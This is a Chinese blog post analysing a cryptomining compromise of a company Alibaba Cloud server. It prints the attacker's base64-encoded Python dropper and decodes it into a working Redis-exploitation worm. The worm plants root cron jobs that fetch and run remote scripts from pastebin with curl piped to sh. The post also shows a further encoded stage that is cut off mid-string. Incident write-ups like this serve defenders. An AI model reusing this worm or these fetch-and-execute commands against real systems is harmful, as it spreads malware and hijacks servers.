热门标签
热门文章
- 1解决idea插件市场plugin无法加载出来_idea插件市场加载不出来
- 2微信小程序:反编译微信小程序获取源码_微信小程序反编译
- 3开源VS闭源:大模型发展路径之争,你站哪一派?_开源模型 闭源模型
- 4《Hadoop权威指南》读书笔记——MapeReduce入门_hadoop相关书籍读书笔记
- 5数据安全防护盾!Amazon SageMaker Notebook 提供原始文件的下载防护功能
- 6Kubernetes的基本认识&发展历程_kuberbetes发展历程
- 7LeetCode-235. Lowest Common Ancestor of a Binary Search Tree [C++][Java]_lowest common ancestor of a binary search tree c++
- 8F2工作流引擎之-纯JS Web在线可拖拽的流程设计器(八)
- 92023版本IDEA创建JavaWeb项目(附有图文详解)_idea2023使用
- 10Can‘t update dev_zgd has no tracked branch_dev has no tracked branch
当前位置: article > 正文
记一次公司阿里云被黑_sh -c echo iyevymlul2jhc2gkcgtpbgwglwygenn2ywpwa2l
作者:笔触狂放9 | 2024-07-15 23:38:49
赞
踩
sh -c echo iyevymlul2jhc2gkcgtpbgwglwygenn2ywpwa2lsbcatzibwzgvmzw5kzxjkcnbra
记一次公司阿里云被黑
1.发现问题
公司阿里云连续四条预警,怀疑是被人黑了,并且用python程序干坏事,于是登录公司阿里云查看一波。
进程异常行为-Linux异常文件下载
敏感文件篡改-Linux共享库文件预加载配置文件可疑篡改
恶意进程(云查杀)-挖矿程序
进程异常行为-Python应用执行异常指令
- 1
- 2
- 3
- 4
2.找到黑客程序
因为有个进程异常行为-Python应用执行异常指令先看看python程序相关进程有没有干坏事
ps -aux | grep python
- 1
结果发现三个相关程序
grep --color=auto python
/usr/bin/pytho -Es /usr/sbin/tuned -l -P
python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
- 1
- 2
- 3
- 4
- 5
- 6
- 第一个是
ps -aux | grep python查询是良民不管他 - 第二个执行了
/usr/sbin/tunedpython文件vim /usr/sbin/tuned看了一下这个文件感觉没有什么问题,但是由于我们服务器程序并没有用的python的地方,良民也给他干掉,把进程杀了 - 第三个一看就感觉不是好东西,先杀再说
3.分析黑客程序
杀完之后研究一下这个东西到底干了什么,看命令是通过python程序执行了一个被base64加密的一个程序,下面把I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz这个base64解码一下看看是什么东西。
百度base64 解码随便找一个在线base64解码的看看干了什么事情,发现解码之后是一个python程序
#coding: utf-8
import urllib
import base64
d= 'https://pastebin.com/raw/nYBpuAxT'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
很明显这个python程序拿到了这个https://pastebin.com/raw/nYBpuAxT这个地址的内容并且base64解码,然后运行这个程序,下面看看这个是个什么东西
IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKCklQX0xJU1QgPSBbXQoKY2xhc3Mgc2Nhbm5lcih0aHJlYWRpbmcuVGhyZWFkKToKICAgIHRsaXN0ID0gW10KICAgIG1heHRocmVhZHMgPSAxMDAKICAgIGV2bnQgPSB0aHJlYWRpbmcuRXZlbnQoKQogICAgbGNrID0gdGhyZWFkaW5nLkxvY2soKQoKICAgIGRlZiBfX2luaXRfXyhzZWxmLGhvc3QpOgogICAgICAgIHRocmVhZGluZy5UaHJlYWQuX19pbml0X18oc2VsZikKICAgICAgICBzZWxmLmhvc3QgPSBob3N0CiAgICBkZWYgcnVuKHNlbGYpOgogICAgICAgIHRyeToKICAgICAgICAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKICAgICAgICAgICAgcy5zZXR0aW1lb3V0KDUpCiAgICAgICAgICAgIHMuY29ubmVjdCgoc2VsZi5ob3N0LCA2Mzc5KSkKICAgICAgICAgICAgcy5zZW5kKCdzZXQgdGlnaHRzb2Z0ICJcXG5cXG5cXG4qLzEgKiAqICogKiByb290IGN1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXFxuXFxuXFxuIlxyXG4nKQogICAgICAgICAgICBzLnNlbmQoJ2NvbmZpZyBzZXQgZGlyIC9ldGMvY3Jvbi5kXHJcbicpCiAgICAgICAgICAgIHMuc2VuZCgnY29uZmlnIHNldCBkYmZpbGVuYW1lIHJvb3RcclxuJykKICAgICAgICAgICAgcy5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgcmVxID0gY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMiA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMCwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhc3MKCmRlZiBydW5Qb3J0c2NhbigpOgogICAgZ2V0X2lwX2xpc3QoKQogICAgZm9yIGhvc3QgaW4gSVBfTElTVDoKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBpZiBsZW4oc2Nhbm5lci50bGlzdCkgPj0gc2Nhbm5lci5tYXh0aHJlYWRzOgogICAgICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICAgICAgc2Nhbm5lci5ldm50LndhaXQoKQogICAgICAgIGVsc2U6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgIHNjYW5uZXIubmV3dGhyZWFkKGhvc3QpCiAgICBmb3IgdCBpbiBzY2FubmVyLnRsaXN0OgogICAgICAgIHQuam9pbigpCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcnVuUG9ydHNjYW4oKQoK
- 1
base64解码之后果然还是应该python程序
#! /usr/bin/env python #coding: utf-8 import threading import socket from re import findall import httplib IP_LIST = [] class scanner(threading.Thread): tlist = [] maxthreads = 100 evnt = threading.Event() lck = threading.Lock() def __init__(self,host): threading.Thread.__init__(self) self.host = host def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((self.host, 6379)) s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n') s.send('config set dir /etc/cron.d\r\n') s.send('config set dbfilename root\r\n') s.send('save\r\n') s.close() except Exception: pass scanner.lck.acquire() scanner.tlist.remove(self) if len(scanner.tlist) < scanner.maxthreads: scanner.evnt.set() scanner.evnt.clear() scanner.lck.release() def newthread(host): scanner.lck.acquire() sc = scanner(host) scanner.tlist.append(sc) scanner.lck.release() sc.start() newthread = staticmethod(newthread) def get_ip_list(): try: url = 'ident.me' conn = httplib.HTTPConnection(url, port=80, timeout=10) req = conn.request(method='GET', url='/', ) result = conn.getresponse() ip2 = result.read() ips2 = findall(r'\d+.\d+.', ip2)[0] for i in range(0, 255): ip_list1 = (ips2 + (str(i))) for g in range(0, 255): IP_LIST.append(ip_list1 + '.' + (str(g))) except Exception: pass def runPortscan(): get_ip_list() for host in IP_LIST: scanner.lck.acquire() if len(scanner.tlist) >= scanner.maxthreads: scanner.lck.release() scanner.evnt.wait() else: scanner.lck.release() scanner.newthread(host) for t in scanner.tlist: t.join() if __name__ == "__main__": runPortscan()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
这个程序就稍微复杂一点了,一点点看吧,先分析一下他写的这些方法
- get_ip_list
访问了http://ident.me这个网址,我访问了一下,这个网址是用来获取被访问网址的ip的,拿到阿里云主机的ip了 ,通过正则拿到这个ip的前两位然后遍历后两位,比如我的ip是192.168.123.213,这个遍历出来一个 192.168.0.0 到 192.168.255.255的数组IP_LIST - scanner类
这个类是继承了threading.Thread类的主要作用就是连接socket(6379)然后发送数据主要是set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n这个 定时执行从https://pastebin.com/raw/xbY7p5Tb拿下脚本并且执行
这个程序主要的作用就是获取到本机ip并且拿到ip的前两位,然后穷举后两位连接端口6379并发送 定时执行从https://pastebin.com/raw/xbY7p5Tb拿下脚本的信息
然后再分析一下这个https://pastebin.com/raw/xbY7p5Tb脚本的内容:
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash
- 1
从https://pastebin.com/raw/uuYVPLXd拿下内容并base64解密执行
IyEvYmluL2Jhc2gKU0hFTEw9L2Jpbi9zaApQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbgoKZnVuY3Rpb24ga2lsbHMoKSB7CnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIHduVEtZZyAmJiBwa2lsbCBkZGcqICYmIHJtIC1yZiAvdG1wL2RkZyogJiYgcm0gLXJmIC90bXAvd25US1lnCnJtIC1yZiAvYm9vdC9ncnViL2RlYW1vbiAmJiBybSAtcmYgL2Jvb3QvZ3J1Yi9kaXNrX2dlbml1cwpybSAtcmYgL3RtcC8qaW5kZXhfYmFrKgpybSAtcmYgL3RtcC8qaHR0cGQuY29uZioKcm0gLXJmIC90bXAvKmh0dHBkLmNvbmYKcm0gLXJmIC90bXAvYTdiMTA0YzI3MApwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJtaW5lLm1vbmVyb3Bvb2wuY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjgwODAifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6MzMzMyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgIm1vbmVyb2hhc2guY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiL3RtcC9hN2IxMDRjMjcwInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjY2NjYifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6Nzc3NyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtci5jcnlwdG8tcG9vbC5mcjo0NDMifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJzdHJhdHVtLmYycG9vbC5jb206ODg4OCJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcnBvb2wuZXUiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXJpZ0RhZW1vbiIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yaWdNaW5lciIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcGtpbGwgLWYgYmlvc2V0amVua2lucwpwa2lsbCAtZiBBblhxVi55YW0KcGtpbGwgLWYgeG1yaWdEYWVtb24KcGtpbGwgLWYgeG1yaWdNaW5lcgpwa2lsbCAtZiB4bXJpZwpwa2lsbCAtZiBMb29wYmFjawpwa2lsbCAtZiBhcGFjZWhhCnBraWxsIC1mIGNyeXB0b25pZ2h0CnBraWxsIC1mIHN0cmF0dW0KcGtpbGwgLWYgbWl4bmVyZHgKcGtpbGwgLWYgcGVyZm9ybWVkbApwa2lsbCAtZiBKbktpaEdqbgpwa2lsbCAtZiBpcnFiYTJhbmMxCnBraWxsIC1mIGlycWJhNXhuYzEKcGtpbGwgLWYgaXJxYm5jMQpwa2lsbCAtZiBpcjI5eGMxCnBraWxsIC1mIGNvbm5zCnBraWxsIC1mIGlycWJhbGFuY2UKcGtpbGwgLWYgY3J5cHRvLXBvb2wKcGtpbGwgLWYgbWluZXhtcgpwa2lsbCAtZiBYSm5Sagpwa2lsbCAtZiBOWExBaQpwa2lsbCAtZiBCSTV6agpwa2lsbCAtZiBhc2tkbGpscXcKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpwa2lsbCAtZiBHdWFyZC5zaApwa2lsbCAtZiB5c2F5ZGgKcGtpbGwgLWYgYm9ubnMKcGtpbGwgLWYgZG9ubnMKcGtpbGwgLWYga3hqZApwa2lsbCAtZiBEdWNrLnNoCnBraWxsIC1mIGJvbm4uc2gKcGtpbGwgLWYgY29ubi5zaApwa2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYga3cuc2gKcGtpbGwgLWYgcHJvLnNoCnBraWxsIC1mIHBvbGtpdGQKcGtpbGwgLWYgYWNwaWQKcGtpbGwgLWYgaWNiNW8KcGtpbGwgLWYgbm9weGkKcGtpbGwgLWYgaXJxYmFsYW5jMQpwa2lsbCAtZiBtaW5lcmQKcGtpbGwgLWYgaTU4Ngpwa2lsbCAtZiBnZGRyCnBraWxsIC1mIG1zdHhtcgpwa2lsbCAtZiBkZGcuMjAxMQpwa2lsbCAtZiB3blRLWWcKcGtpbGwgLWYgZGVhbW9uCnBraWxsIC1mIGRpc2tfZ2VuaXVzCnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIC1mIGJhc2h4CnBraWxsIC1mIGJhc2hnCnBraWxsIC1mIGJhc2hlCnBraWxsIC1mIGJhc2hmCnBraWxsIC1mIGJhc2hoCnBraWxsIC1mIFhiYXNoWQpwa2lsbCAtZiBsaWJhcGFjaGUKcm0gLXJmIC90bXAvaHR0cGQuY29uZgpybSAtcmYgL3RtcC9jb25uCnJtIC1yZiAvdG1wL3Jvb3Quc2ggL3RtcC9wb29scy50eHQgL3RtcC9saWJhcGFjaGUgL3RtcC9jb25maWcuanNvbiAvdG1wL2Jhc2hmIC90bXAvYmFzaGcgL3RtcC9saWJhcGFjaGUKcm0gLXJmIC90bXAvY29ubnMKcm0gLWYgL3RtcC9pcnEuc2gKcm0gLWYgL3RtcC9pcnFiYWxhbmMxCnJtIC1mIC90bXAvaXJxCnJtIC1mIC90bXAva3dvcmtlcmRzIC9iaW4va3dvcmtlcmRzIC9iaW4vY29uZmlnLmpzb24KbmV0c3RhdCAtYW5wIHwgZ3JlcCA2OS4yOC41NS44Njo0NDMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAzMzMzIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDU1NTUgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCA2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNzc3NyB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDMzNDcgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAxNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDUuMTk2LjIyNS4yMjIgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKeT0kKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAga3dvcmtlcmRzIHwgd2MgLWwgKQppZiBbICR7eX0gLWVxIDAgXTt0aGVuCgluZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05CmZpCn0KCmZ1bmN0aW9uIHN5c3RlbSgpIHsKCWlmIFsgISAtZiAiL2Jpbi9odHRwZG5zIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLW8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlpZiBbICEgLWYgIi9iaW4vaHR0cGRucyIgXTsgdGhlbgoJCQl3Z2V0ICBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLU8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlmaQoJCXNlZCAtaSAnJGQnIC9ldGMvY3JvbnRhYiAmJiBlY2hvIC1lICIqICovNiAqICogKiByb290IC9iaW4vc2ggL2Jpbi9odHRwZG5zIiA+PiAvZXRjL2Nyb250YWIKCWZpCgkJCn0KCmZ1bmN0aW9uIHRvcCgpIHsKCWlmIFsgISAtZiAiL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjUvMTUzNTU5NTQyN3gtMTQwNDgxNzcxMi5qcGcgLW8gL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28KCQlpZiBbICEgLWYgIi91c3IvbG9jYWwvbGliL2xpYm50cC5zbyIgXTsgdGhlbgoJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2NS8xNTM1NTk1NDI3eC0xNDA0ODE3NzEyLmpwZyAtTyAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28gJiYgY2htb2QgNzU1IC91c3IvbG9jYWwvbGliL2xpYm50cC5zbwoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2xkLnNvLnByZWxvYWQiIF07IHRoZW4KCQllY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+IC9ldGMvbGQuc28ucHJlbG9hZAoJZWxzZQoJCXNlZCAtaSAnJGQnIC9ldGMvbGQuc28ucHJlbG9hZCAmJiBlY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+PiAvZXRjL2xkLnNvLnByZWxvYWQKCWZpCgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvbGQuc28ucHJlbG9hZAoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2xpYi9saWJqZGsuc28KCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvCgllY2hvIDA+L3Zhci9zcG9vbC9tYWlsL3Jvb3QKCWVjaG8gMD4vdmFyL2xvZy93dG1wCgllY2hvIDA+L3Zhci9sb2cvc2VjdXJlCgllY2hvIDA+L3Zhci9sb2cvY3Jvbgp9CgpmdW5jdGlvbiBweXRob24oKSB7Cglub2h1cCBweXRob24gLWMgImltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKCdJMk52WkdsdVp6b2dkWFJtTFRnS2FXMXdiM0owSUhWeWJHeHBZZ3BwYlhCdmNuUWdZbUZ6WlRZMENncGtQU0FuYUhSMGNITTZMeTl3WVhOMFpXSnBiaTVqYjIwdmNtRjNMMjVaUW5CMVFYaFVKd3AwY25rNkNpQWdJQ0J3WVdkbFBXSmhjMlUyTkM1aU5qUmtaV052WkdVb2RYSnNiR2xpTG5WeWJHOXdaVzRvWkNrdWNtVmhaQ2dwS1FvZ0lDQWdaWGhsWXlod1lXZGxLUXBsZUdObGNIUTZDaUFnSUNCd1lYTnonKSkiID4vZGV2L251bGwgMj4mMSAmCgl0b3VjaCAvdG1wLy50bXBhCn0KCmZ1bmN0aW9uIGVjaG9jcm9uKCkgewoJZWNobyAtZSAiKi8xMCAqICogKiAqIHJvb3QgL2Jpbi9jaG1vZCA3NTUgL3Vzci9iaW4vY3VybCAmJiAvdXNyL2Jpbi9jdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvY3Jvbi5kL3Jvb3QKCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLW8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvdG1wL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLU8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC90bXAva3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBkb3dubG9hZHJ1bnhtKCkgewoJcG09JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG19IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL2Jpbi9jb25maWcuanNvbiIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtbyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJaWYgWyAhIC1mICIvYmluL2NvbmZpZy5qc29uIiBdOyB0aGVuCgkJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtTyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJZmkKCQlmaQoJCWlmIFsgISAtZiAiL2Jpbi9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9Cgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3